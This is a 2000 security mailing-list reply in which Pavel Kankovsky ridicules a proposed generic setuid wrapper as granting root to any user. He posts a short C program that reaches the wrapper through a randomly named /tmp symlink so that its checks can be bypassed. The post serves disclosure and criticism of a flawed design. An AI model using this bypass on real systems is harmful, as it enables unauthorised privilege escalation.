Re: Format String Attacks

[Pavel Kankovsky <peak () ARGO TROJA MFF CUNI CZ>]

On Wed, 13 Sep 2000, Doug Hughes wrote:

> Since I don't recall anybody else posting one, here is a simple, generic,
> setuid wrapper that people could use around, for instance, /usr/bin/eject
> or other setuid programs.

<ironic>

Thank you for a nice implementation of sudo that does not bother asking
for a password. Instant root for any user...very nice. But wait! It is not
complete. Here is the missing piece:

#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/param.h>
#include <limits.h>

int
main(int argc, char **argv, char **envp)
{
  char oldpath[MAXPATHLEN];
  char newpath[sizeof("/tmp/.orig") + (CHAR_BIT*sizeof(long)/3+1)];

  ++argv;
  srandom(getpid() + 5*time());
  if (argc < 2)
    { fprintf(stderr, "missing argument\n"); return 1; }
  if (realpath(argv[0], oldpath) == NULL)
    { fprintf(stderr, "realpath failed\n"); return 1; }
  sprintf(newpath, "/tmp/%ld.orig", random());
  if (symlink(oldpath, newpath) == -1)
    { perror("symlink"); return 1; }
  strrchr(newpath, '.')[0] = '\0';
  argv[0] = newpath;
  execve("path-to-your-wrapper", argv, envp);
  perror("execve"); return 1;
}

</ironic>

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."